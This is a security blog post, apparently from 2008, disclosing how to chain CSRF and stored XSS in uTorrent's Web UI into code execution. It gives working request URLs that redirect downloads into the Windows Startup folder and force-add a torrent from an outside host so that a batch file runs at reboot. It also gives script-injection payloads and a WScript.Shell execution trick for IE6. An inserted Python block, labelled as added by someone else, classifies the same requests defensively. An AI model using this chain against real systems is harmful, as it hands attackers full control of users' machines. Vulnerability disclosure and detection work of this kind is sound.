I was going to keep this under my hat, so to speak, but this has forced my
hand <http://packetstorm.austin2600.net/0804-exploits/torrent-pwnage.txt>.

<http://bp1.blogger.com/_E_3RnfZAsxE/SAqX9O0tixI/AAAAAAAAAII/6nsskS7Ooko/s1600-h/utorrent2yk4.png>
I found a few CSRFs that when put together can make a pretty devastating
attack against uTorrent's Web UI. Basically you can force uTorrent to move
completed downloads to an arbitrary directory on their system, download
arbitrary torrents, and completely pwn their box.

This guy from rooksecurity.com <http://www.rooksecurity.com/blog/?p=10> had
a couple of interesting CSRFs that change the username and password
required for the Web UI. But in order for the attacker to change the
username and password, the user must already be authenticated, so why go to
all that trouble? For this attack we're going to assume that the user is
already authenticated to uTorrent's Web UI.

First of all you need a way to get a file on their computer. Not only that,
but you want to be able to put that file in an arbitrary location of your
choosing. To do that you need to turn on uTorrent's "Move completed
downloads to" option.

<http://bp2.blogger.com/_E_3RnfZAsxE/SAqZbe0tiyI/AAAAAAAAAIQ/CasF7v9mgvk/s1600-h/utorrent_1.png>
Then you need to tell uTorrent what directory to move the completed file to.

<http://bp0.blogger.com/_E_3RnfZAsxE/SAqZ1-0tizI/AAAAAAAAAIY/MpD5jZZGWrE/s1600-h/utorrent_2.png>
The URL is cut off in the screenshot, so here's what's actually happening:

http://localhost:14774/gui/?action=setsetting&s=dir_completed_download&v=C:\Documents%20and%20Settings\All%20Users\Start%20Menu\Programs\Startup

And this is what uTorrent's downloads preferences should now look like:

<http://bp0.blogger.com/_E_3RnfZAsxE/SAqfj-0ti2I/AAAAAAAAAIw/1JlyWCL6kf8/s1600-h/utorrent_4.png>
Completed files will be moved to the All Users Startup folder, and once we
can force them to download files we effectively have pwnage. I can actually
force them to download a torrent by doing the following:

http://localhost:14774/gui/?action=add-url&s=http://www.whatever.com/file.torrent

Let's say that the torrent makes uTorrent download pwn.bat. Once the
download finishes, pwn.bat resides in the Startup folder and gets executed
when the user reboots. But wait, it gets worse...

uTorrent has an XSS in the Web UI! Remember my previous two posts
<http://r00tin.blogspot.com/2008/03/local-web-servers-are-dangerous.html>
<http://r00tin.blogspot.com/2008/04/more-on-local-web-servers.html> about
the dangers of local web servers? There are actually a few different
spots to exploit this. Here are the PoC strings for the XSS vectors.

http://localhost:14774/gui/?action=setsetting&s=tracker_ip&v=%3Cscript%3Ealert('xss')%3C/script%3E

http://localhost:14774/gui/?action=setsetting&s=ct_hist_comm&v=%3Cscript%3Ealert('xss')%3C/script%3E

http://localhost:14774/gui/?action=setsetting&s=dir_active_download&v=%3Cscript%3Ealert('xss')%3C/script%3E

<http://bp0.blogger.com/_E_3RnfZAsxE/SAqeg-0ti1I/AAAAAAAAAIo/6kmtkQekXCQ/s1600-h/utorrent_3.png>
These are ALL persistent XSS attacks. To make the malicious JavaScript fire
you need to force the user's browser to visit

http://localhost:14774/gui/?action=getsettings

Remember, the "localhost" portion is VERY important because you want to
perform a Cross ZONE Scripting attack, not just XSS. You could use
"loopback" in place of "localhost" as well. So, moving on...

<http://bp2.blogger.com/_E_3RnfZAsxE/R88A9HShf5I/AAAAAAAAACE/W0rUo65Z97M/s1600-h/local_intranet.png>
If your target is using IE 6 then you don't have to force them to download a
file to the Startup folder and wait for them to restart their box. All you
have to do is force them to download the file to a location like C:\ and
then execute it for them with the WScript.Shell ActiveXObject, since your
JavaScript is in the Local Intranet zone.
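From the defender's side, the requests above are easy to spot in a local proxy or host log because every step is a plain GET with a telling query string. The classifier below is an added example written for this post (not code from the post or from uTorrent); the port, the setting names and the request strings come from the post, while the log format and the benign sample requests are constructed assumptions.

```python
# Added example: screen uTorrent Web UI request URLs (e.g. from a local proxy
# log) for the CSRF and stored-XSS patterns described above. Port and setting
# names are from the post; the sample request list is constructed.
from urllib.parse import parse_qs, urlsplit

# Settings that hold filesystem paths; pointing one at a Startup folder
# turns a forced download into code execution at the next login.
PATH_SETTINGS = {"dir_completed_download", "dir_active_download"}

def classify_request(url: str) -> list[str]:
    """Return human-readable findings for one Web UI URL (empty if benign)."""
    parts = urlsplit(url)
    if not parts.path.startswith("/gui/"):
        return []
    q = parse_qs(parts.query, keep_blank_values=True)  # also percent-decodes
    action = q.get("action", [""])[0]
    setting = q.get("s", [""])[0]
    value = q.get("v", [""])[0]
    findings = []
    if action == "add-url":
        findings.append("torrent added from a remote URL via GET (CSRF-able)")
    elif action == "setsetting":
        if setting in PATH_SETTINGS and "startup" in value.lower():
            findings.append(f"{setting} pointed at a Startup folder")
        if "<" in value or "javascript:" in value.lower():
            findings.append(f"markup in setting {setting} (stored XSS candidate)")
    elif action == "getsettings":
        findings.append("settings page fetched (stored-XSS trigger point)")
    return findings

def scan(urls):
    """Map each suspicious URL to its findings; benign URLs are dropped."""
    return {u: f for u in urls if (f := classify_request(u))}

# Constructed sample: the post's requests plus two benign ones.
SAMPLE_REQUESTS = [
    r"http://localhost:14774/gui/?action=setsetting&s=dir_completed_download"
    r"&v=C:\Documents%20and%20Settings\All%20Users\Start%20Menu\Programs\Startup",
    "http://localhost:14774/gui/?action=add-url&s=http://www.whatever.com/file.torrent",
    "http://localhost:14774/gui/?action=setsetting&s=tracker_ip"
    "&v=%3Cscript%3Ealert('xss')%3C/script%3E",
    "http://localhost:14774/gui/?action=getsettings",
    "http://localhost:14774/gui/?action=setsetting&s=max_dl_rate&v=500",
    "http://localhost:14774/gui/?list=1",
]

if __name__ == "__main__":
    for url, hits in scan(SAMPLE_REQUESTS).items():
        print(url, "->", "; ".join(hits))
```

A request to the gui path carrying a Referer from a non-local origin would be the stronger signal in a real proxy log, but the query string alone already separates the four attack steps from ordinary UI traffic.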

<http://bp1.blogger.com/_E_3RnfZAsxE/SAqdYO0ti0I/AAAAAAAAAIg/3AKPa1Rl1qY/s1600-h/stallowned.jpg>
Pwn3d. Stay tuned, more torrent pwnage to come soon...
